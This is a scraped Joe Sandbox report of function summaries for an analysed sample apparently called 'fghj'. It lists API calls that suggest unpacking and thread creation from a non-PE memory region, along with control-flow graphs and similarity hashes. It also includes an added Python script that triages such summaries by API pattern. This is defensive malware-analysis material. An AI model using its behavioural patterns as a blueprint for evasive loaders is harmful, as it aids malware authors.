                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 00B50414
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00B504B7
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 00B504EA
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00B5065B
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID: Virtual$ProtectSection$CreateView$AllocThread
• String ID:
• API String ID: 1248616170-0
• Opcode ID: 34e3949558d47ac2efbd442dc042839410f73323f736e1ca0bff09bbd7760ed0
• Instruction ID: 342e32875bbac63fd9b5cde7fa96ef4e5554f24239f3a6bcf4b3b9e6eee25946
• Opcode Fuzzy Hash: 34e3949558d47ac2efbd442dc042839410f73323f736e1ca0bff09bbd7760ed0
• Instruction Fuzzy Hash: E5429B71618301AFDB24EF24C884B6BB7E8EF88715F1449ADFD859B251E770E848CB52

Control-flow Graph

control_flow_graph 187 3a6eb0-3a6eb7 188 3a6eb9 call 3a6a6e 187->188 189 3a6ebe-3a6ef6 call 3a1062 187->189 188->189 193 3a6efa-3a6f06 189->193 194 3a6ef8 189->194 195 3a6f0a-3a6f1c 193->195 196 3a6f08 193->196 194->193 197 3a6f1e 195->197 198 3a6f21-3a6f2d 195->198 196->195 197->198 199 3a6f2f 198->199 200 3a6f31-3a6f40 198->200 199->200 201 3a6f45-3a6f8c call 3a4591 call 3aaaa0 200->201 206 3a6f8e-3a6f91 201->206 207 3a6f96-3a6fa2 206->207 208 3a6faa-3a6fb0 207->208 209 3a6fa4 207->209 210 3a6fb8-3a6fcb 208->210 211 3a6fb2 208->211 209->208 210->207 212 3a6fcd-3a6fe1 210->212 211->210 213 3a6fe6-3a7009 212->213 214 3a700b 213->214 214->213 215 3a700d-3a7013 214->215 216 3a701b-3a7024 215->216 217 3a7015 215->217 219 3a6fd8-3a6fe1 216->219 220 3a7026 216->220 217->216 219->213 220->214 221 3a7028-3a7043 call 3a6257 220->221 224 3a7048-3a7083 call 3a52c2 221->224 228 3a7085-3a70ac 224->228
APIs
• Part of subcall function 003A6A6E: FreeLibrary.KERNEL32(?,?,003A6EBE,?,00000000,003A2493,Advapi32.dll,?,?,00000000,003A2797,00000001), ref: 003A6A73
• GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
• GetProcAddress.KERNEL32(00000000), ref: 003A8433
• VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: AddressAllocFreeHandleLibraryModuleProcVirtual
• String ID:
• API String ID: 207875923-0
• Opcode ID: c885bbb8134066eb2c9f57a40e236f24b4378e5334045258267fee2615f00c37
• Instruction ID: 45e9be412c445124f57bd924f9aad240eca53388c49457606189336df0a76533
• Opcode Fuzzy Hash: c885bbb8134066eb2c9f57a40e236f24b4378e5334045258267fee2615f00c37
• Instruction Fuzzy Hash: 11E21377D103218FC74BEF79EC8756A376AFB93310B46862EE402DB166DF3855428A81

Control-flow Graph

control_flow_graph 229 3a6f23-3a6f2d 230 3a6f2f 229->230 231 3a6f31-3a6f40 229->231 230->231 232 3a6f45-3a6f8c call 3a4591 call 3aaaa0 231->232 237 3a6f8e-3a6f91 232->237 238 3a6f96-3a6fa2 237->238 239 3a6faa-3a6fb0 238->239 240 3a6fa4 238->240 241 3a6fb8-3a6fcb 239->241 242 3a6fb2 239->242 240->239 241->238 243 3a6fcd-3a6fe1 241->243 242->241 244 3a6fe6-3a7009 243->244 245 3a700b 244->245 245->244 246 3a700d-3a7013 245->246 247 3a701b-3a7024 246->247 248 3a7015 246->248 250 3a6fd8-3a6fe1 247->250 251 3a7026 247->251 248->247 250->244 251->245 252 3a7028-3a7043 call 3a6257 251->252 255 3a7048-3a7083 call 3a52c2 252->255 259 3a7085-3a70ac 255->259
APIs
• GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
• GetProcAddress.KERNEL32(00000000), ref: 003A8433
• VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: AddressAllocHandleModuleProcVirtual
• String ID:
• API String ID: 3695083113-0
• Opcode ID: c7790a1db8d57cef4c04081c4c29b71810ed557408e7581176e612a6454795b1
• Instruction ID: 2119e4bcd88c0f3e694ff27bc6a84b9f43bb835dd4ac392bc3765f7719459c3d
• Opcode Fuzzy Hash: c7790a1db8d57cef4c04081c4c29b71810ed557408e7581176e612a6454795b1
• Instruction Fuzzy Hash: E4E21437D143218FD74BEF79EC8656A376AFB93310B46862EE402DB166DF3855028B81

Control-flow Graph

control_flow_graph 260 3a70d7-3a70d9 261 3a70e0-3a7614 call 3a8f61 call 3a9e25 call 3a8f61 call 3a6208 call 3a8f61 call 3a2341 call 3a956c call 3a5a60 call 3a8f61 call 3a4a90 call 3a9e25 call 3a57ed call 3a8f61 call 3a9e25 call 3a19b6 call 3a6dd3 call 3a8f61 * 3 call 3a68ff call 3a4961 call 3a4724 call 3a3eaf call 3a8f61 call 3a1160 call 3a9e25 call 3a8f61 call 3a20f6 call 3a9937 call 3a8f61 call 3a319e call 3a5562 call 3a30f4 call 3a8f61 call 3a5e82 call 3a8f61 call 3a5301 call 3a2280 call 3a3eaf * 2 call 3a6dd3 call 3a3eaf call 3a8f61 call 3a50ae call 3a8f61 call 3a6696 call 3a30f4 call 3a6494 call 3a10fa call 3a4878 260->261 262 3a70db call 3a28cf 260->262 363 3a7619-3a88f0 call 3a5652 call 3a247a call 3a3eaf call 3a5d0f call 3a5b0a call 3a19b6 call 3a6a35 call 3a330f call 3a6494 call 3a3eaf call 3aa3fc call 3a5301 call 3a6dd3 call 3a3eaf call 3a4522 call 3a30f4 call 3a8f61 call 3a5397 call 3a8f61 call 3a1c56 call 3a57ed call 3a8f61 call 3a1aa8 call 3a48c2 call 3a4522 call 3a60f3 call 3a6b01 call 3a3eaf call 3a6dd3 call 3a939e call 3a4522 GetModuleHandleW call 3a5e82 call 3a4522 * 2 call 3a6494 call 3a8f61 * 3 call 3a5c9f call 3a330f call 3a2825 call 3a30f4 call 3a8f61 call 3a6696 call 3a2825 call 3a3eaf call 3a615c call 3a5a31 call 3a5397 call 3a54f1 call 3a6494 call 3a8f61 call 3a4bab call 3a8f61 * 2 call 3a956c call 3a9937 call 3a8f61 * 2 call 3a6dd3 call 3a9937 call 3a6a6d call 3a2b64 call 3a3eaf * 2 call 3a8f61 call 3a52c2 call 3a2825 call 3a939e call 3a30f4 call 3a3eaf call 3a19b6 call 3a2825 call 3a8f61 call 3a6696 call 3a6494 call 3a8f61 call 3a1c56 call 3a6dd3 * 2 call 3a30f4 call 3a52c2 call 3a9937 * 2 call 3a1478 call 3a49ca call 3a2b64 call 3a8f61 call 3a3eaf call 3a8f61 * 2 call 3a4bab call 3a505e call 3a500d call 3a4cef call 3aa3fc call 3a8f61 * 2 call 3a4522 call 3a9e25 call 3a3eaf call 3a49ca call 3a6dd3 call 3a4522 call 3a30f4 call 3a5722 call 3a8f61 call 3a4522 call 3a9c60 call 3a8f61 call 3aa3fc call 3a956c call 3a6b01 call 3a939e GetProcAddress call 3a500d call 3a5323 call 3a6dd3 call 3a1aa8 call 3a9700 call 3a25eb call 3a24b1 call 3a2b64 call 3a4522 call 3a8f61 call 3a4a15 call 3a1160 call 3a939e call 3a1cb8 call 3a9c60 call 3a45f3 call 3a8f61 call 3a40c8 call 3a5c9f call 3a5161 call 3a5c9f call 3a5722 call 3a8f61 * 2 call 3a41f1 call 3a421e call 3a20f6 call 3a30f4 call 3a6a35 call 3a5b0a call 3a8f61 call 3a30f4 call 3a102c call 3a6696 call 3a30f4 call 3a8f61 * 3 call 3a30f4 call 3a1478 call 3a15a7 call 3a41f1 call 3a8f61 * 2 call 3a565e call 3a8f61 call 3a19b6 call 3a500d 261->363 364 3a7614 call 3a4878 261->364 262->261 364->363
APIs
• GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
• GetProcAddress.KERNEL32(00000000), ref: 003A8433
• VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: AddressAllocHandleModuleProcVirtual
• String ID:
• API String ID: 3695083113-0
• Opcode ID: 29d7feaee6e1f11fb6191351d0b0df369689ccc556f18a29aaf7a80e7304ceeb
• Instruction ID: 58a3ec0f03cb5cf2562d99591bd6795aaa026c38f270a69a012089d80fe01f28
• Opcode Fuzzy Hash: 29d7feaee6e1f11fb6191351d0b0df369689ccc556f18a29aaf7a80e7304ceeb
• Instruction Fuzzy Hash: 3DE203379143218FC74BEF79EC8756A376AFB93310B46862EE402DB166DF3855028A85

Control-flow Graph

control_flow_graph 690 b00a9b-b00ae2 CreateToolhelp32Snapshot 693 b00bb8-b00bbb 690->693 694 b00ae8-b00b09 Thread32First 690->694 695 b00ba4-b00bb6 CloseHandle 694->695 696 b00b0f-b00b15 694->696 695->693 697 b00b84-b00b9e Thread32Next 696->697 698 b00b17-b00b1d 696->698 697->695 697->696 698->697 699 b00b1f-b00b3e 698->699 699->697 701 b00b40-b00b44 699->701 702 b00b46-b00b5a 701->702 703 b00b5c-b00b6b 701->703 705 b00b70-b00b7f 702->705 703->705 705->697
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,00B005E1,?,00000001,?,81EC8B55,000000FF), ref: 00B00AD9
• Thread32First.KERNEL32(00000000,0000001C), ref: 00B00B05
• Thread32Next.KERNEL32(00000000,0000001C), ref: 00B00B9A
• CloseHandle.KERNEL32(00000000), ref: 00B00BB6
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 3643885135-0
• Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
• Instruction ID: 79fe530abb5b9754d2937e31bae27c0a0afe29f0feb715fbb01db23866daf663
• Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
• Instruction Fuzzy Hash: AF411E71600109AFDB18DF98C490BADBBF6EF88304F1080A8E6159B7E4DB34AE41CB94
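Three API patterns in the function summaries above are the ones an analyst pulls out of a report like this first: the thread walk (CreateToolhelp32Snapshot with flags 00000004, then Thread32First/Thread32Next, then CloseHandle) in the 0xB00000 region, the run-time import resolution (GetModuleHandleW followed by GetProcAddress and VirtualAlloc) in the 0x3A0000 image, and CreateThread from the 0xB00000 region, which the sandbox reports as not based on a PE. The script below is an added example, not part of the Joe Sandbox report or of its IDA plugin: it parses plain-text function summaries in the format shown on this page and tags each function by those patterns. The sample text is constructed from entries on this page; the tag names and the rules behind them are the example's own choices, and TH32CS_SNAPTHREAD = 0x4 is the documented Toolhelp flag value.

```python
"""Triage helper for Joe Sandbox "IDA Plugin" function summaries (added example,
not part of the report). Parses the "APIs" / "Memory Dump Source" blocks and
tags API patterns worth an analyst's attention first."""
import re
from dataclasses import dataclass, field

# Constructed sample: three function summaries in the report's text format.
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,00B005E1,?,00000001,?,81EC8B55,000000FF), ref: 00B00AD9
• Thread32First.KERNEL32(00000000,0000001C), ref: 00B00B05
• Thread32Next.KERNEL32(00000000,0000001C), ref: 00B00B9A
• CloseHandle.KERNEL32(00000000), ref: 00B00BB6
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
APIs
• Part of subcall function 003A6A6E: FreeLibrary.KERNEL32(?,?,003A6EBE,?,00000000,003A2493,Advapi32.dll,?,?,00000000,003A2797,00000001), ref: 003A6A73
• GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
• GetProcAddress.KERNEL32(00000000), ref: 003A8433
• VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00B5065B
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function X:".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# "• Source File: <dump>, Offset: <base>, based on PE: true|false"
SRC_RE = re.compile(
    r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")

TH32CS_SNAPTHREAD = 0x00000004  # documented Toolhelp flag: include threads in the snapshot


@dataclass
class ApiCall:
    name: str
    module: str
    args: list      # ints for hex tokens, str for "?" and string arguments
    ref: int        # call-site address
    subcall: bool   # True when the report attributes the call to a callee


@dataclass
class FunctionSummary:
    calls: list = field(default_factory=list)
    base: int = 0
    pe_backed: bool = True


def parse_arg(tok):
    """Hex token -> int (sign kept); anything else ('?', 'Advapi32.dll') stays a string."""
    tok = tok.strip()
    m = re.fullmatch(r"(-?)([0-9A-Fa-f]+)", tok)
    if not m:
        return tok
    val = int(m.group(2), 16)
    return -val if m.group(1) else val


def parse_summaries(text):
    """Split the report text at each 'APIs' heading into FunctionSummary records."""
    summaries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionSummary()
            summaries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args,
                                     int(m["ref"], 16), m["sub"] is not None))
            continue
        m = SRC_RE.search(line)
        if m:
            cur.base = int(m["base"], 16)
            cur.pe_backed = (m["pe"] == "true")
    return summaries


def triage(s):
    """Tag one function summary. Tag names and rules are this example's own choices."""
    names = {c.name for c in s.calls if not c.subcall}  # calls made by this function itself
    tags = set()
    if not s.pe_backed:
        # Dump the sandbox could not tie to a PE image: typically an unpacked or injected stage.
        tags.add("unbacked_region")
    snaps = [c for c in s.calls if c.name == "CreateToolhelp32Snapshot"
             and c.args and isinstance(c.args[0], int) and c.args[0] & TH32CS_SNAPTHREAD]
    if snaps and names & {"Thread32First", "Thread32Next"}:
        tags.add("thread_enumeration")
    if "GetProcAddress" in names and names & {"GetModuleHandleW", "GetModuleHandleA",
                                              "LoadLibraryW", "LoadLibraryA"}:
        tags.add("dynamic_api_resolution")  # imports resolved at run time instead of via the IAT
    if names & {"VirtualAlloc", "VirtualProtect"}:
        tags.add("virtual_memory_ops")
    if "CreateThread" in names:
        tags.add("creates_thread")
    return tags


def triage_report(text):
    """[(base address as 8 hex digits, sorted tags), ...] for every function in the text."""
    return [(f"{s.base:08X}", sorted(triage(s))) for s in parse_summaries(text)]


if __name__ == "__main__":
    for base, tags in triage_report(SAMPLE):
        print(base, ", ".join(tags) or "-")
```

Calls the report marks as "Part of subcall function" are parsed but excluded from the tagging rules, so FreeLibrary in the second summary does not count against that function; the "based on PE" field is what separates the on-disk image at 0x3A0000 from the 0xB00000 region.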

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 003A8433
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: AddressAllocProcVirtual
• String ID:
• API String ID: 2770133467-0
• Opcode ID: ebbadc81aebed61b38de97e612dd9578c9ed19d327f4b89fda4351677e85069e
• Instruction ID: 88ad4baaf8dd8e33a2bbbba0a83ff74e0a94da412aea31168dd892c20b84a379
• Opcode Fuzzy Hash: ebbadc81aebed61b38de97e612dd9578c9ed19d327f4b89fda4351677e85069e
• Instruction Fuzzy Hash: 267214379143218FC74BFF75EC8756A376AEB93310F46862EE802DB166DF3855028A85

Control-flow Graph

APIs
• GetProcAddress.KERNEL32(00000000), ref: 003A8433
• VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: AddressAllocProcVirtual
• String ID:
• API String ID: 2770133467-0
• Opcode ID: 26b7c388c938c0547108e5e21c812eb0eb564391889452223872f28aea43a13a
• Instruction ID: cb9f25a33cee7e61169141a983398746f4be9b19d861a089789f12c1af1926f5
• Opcode Fuzzy Hash: 26b7c388c938c0547108e5e21c812eb0eb564391889452223872f28aea43a13a
• Instruction Fuzzy Hash: 2F4202379043218FC74BFF79EC8756A376AEB93310F45862EE802DB166DF3855428A91

Control-flow Graph

APIs
• GetProcAddress.KERNEL32(00000000), ref: 003A8433
• VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: AddressAllocProcVirtual
• String ID:
• API String ID: 2770133467-0
• Opcode ID: 3b5f2700535dcf6097441ce3006db04afaa227aa1a59fff034c51bfeb2f2bdaf
• Instruction ID: 1058932a26caa12d1970695e0890995366179c6b4df5461924b3e130dcf8d379
• Opcode Fuzzy Hash: 3b5f2700535dcf6097441ce3006db04afaa227aa1a59fff034c51bfeb2f2bdaf
• Instruction Fuzzy Hash: A93215379003218FDB4BFF75EC8756A376AEB93310F45862EE802DB166DF3855428A91

Control-flow Graph

control_flow_graph 1310 b0094b-b009a2 GetPEB 1311 b009ad-b009b1 1310->1311 1312 b00a51-b00a58 1311->1312 1313 b009b7-b009c2 1311->1313 1314 b00a63-b00a67 1312->1314 1315 b009c8-b009df 1313->1315 1316 b00a4c 1313->1316 1318 b00a78-b00a7f 1314->1318 1319 b00a69-b00a76 1314->1319 1320 b009e1-b00a02 1315->1320 1321 b00a04-b00a1c CreateThread 1315->1321 1316->1311 1323 b00a81-b00a83 1318->1323 1324 b00a88-b00a8d 1318->1324 1319->1314 1325 b00a20-b00a28 1320->1325 1321->1325 1323->1324 1325->1316 1326 b00a2a-b00a47 1325->1326 1326->1316
APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00B00A17
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID: ,
• API String ID: 2422867632-3772416878
• Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
• Instruction ID: 3b2c94b69226908bbc692ed78ec0948c11989a78917eb71c5eb87aedbebcdeed
• Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
• Instruction Fuzzy Hash: 5941A274A00209EFDB14DF98C994BAEBBB1FF88314F208198D515AB391C775AE81DF94

Control-flow Graph

control_flow_graph 1357 b0038b-b004f3 call b0093b call b00f3b call b010eb call b00cdb 1366 b00924-b00927 1357->1366 1367 b004f9-b00500 1357->1367 1368 b0050b-b0050f 1367->1368 1369 b00531-b005ac GetPEB 1368->1369 1370 b00511-b0052f call b00e5b 1368->1370 1371 b005b7-b005bb 1369->1371 1370->1368 1373 b005d3-b005e5 call b00a9b 1371->1373 1374 b005bd-b005d1 1371->1374 1380 b005e7-b0060d 1373->1380 1381 b0060f-b00630 CreateThread 1373->1381 1374->1371 1382 b00633-b00637 1380->1382 1381->1382 1384 b008f8-b0091b 1382->1384 1385 b0063d-b00670 call b00f9b 1382->1385 1384->1366 1385->1384 1389 b00676-b006c5 1385->1389 1391 b006d0-b006d6 1389->1391 1392 b006d8-b006de 1391->1392 1393 b0071e-b00722 1391->1393 1394 b006e0-b006ef 1392->1394 1395 b006f1-b006f5 1392->1395 1396 b007f0-b008e3 call b00a9b call b0093b call b00f3b 1393->1396 1397 b00728-b00735 1393->1397 1394->1395 1398 b006f7-b00705 1395->1398 1399 b0071c 1395->1399 1423 b008e5 1396->1423 1424 b008e8-b008f2 1396->1424 1400 b00740-b00746 1397->1400 1398->1399 1401 b00707-b00719 1398->1401 1399->1391 1404 b00776-b00779 1400->1404 1405 b00748-b00756 1400->1405 1401->1399 1406 b0077c-b00783 1404->1406 1408 b00774 1405->1408 1409 b00758-b00767 1405->1409 1406->1396 1410 b00785-b0078e 1406->1410 1408->1400 1409->1408 1412 b00769-b00772 1409->1412 1410->1396 1414 b00790-b007a0 1410->1414 1412->1404 1416 b007ab-b007b7 1414->1416 1418 b007e8-b007ee 1416->1418 1419 b007b9-b007e6 1416->1419 1418->1406 1419->1416 1423->1424 1424->1384
APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 00B0062E
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 83a9ce226285de2af24d33c37b84caa5f46340f75418e4fe094d25e21513067a
• Instruction ID: bf71d43f936098de2cda7348e3eaa5d823d23bb634bc4f0e8a289a93cda865a9
• Opcode Fuzzy Hash: 83a9ce226285de2af24d33c37b84caa5f46340f75418e4fe094d25e21513067a
• Instruction Fuzzy Hash: 2F12D2B4E10219DFDB14DF98C991BADBBB2FF88304F2482A9D515AB385C734AA41CF54

Control-flow Graph

APIs
• VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                    • Opcode ID: e6db0bfe26ad87675155cc4295882a7761d8dbd8febf9a67d4680601801dad8b
                                                                                                                                                                                                                    • Instruction ID: 720264fff45f30e84cc8d0dd37f0c74a7819c853aa0e8814c17baad71ba8e242
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6db0bfe26ad87675155cc4295882a7761d8dbd8febf9a67d4680601801dad8b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D60226779003218FC70BEF7AEC9756A376AFB93314F45862EE802DB065DF3855428A81


APIs
• VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 9eb39fae557889e25e2d2902d05143205b1042525ce09bea2374b76993de160e
• Instruction ID: df48aa8740f49236d8969e7315d76a3e43a8f93fd9685fe2617e5d1be54011a4
• Opcode Fuzzy Hash: 9eb39fae557889e25e2d2902d05143205b1042525ce09bea2374b76993de160e
• Instruction Fuzzy Hash: D2F147779003218FDB0BEF7AEC9755A376AFB93310F45862EE802DB065DF3855428A81
APIs
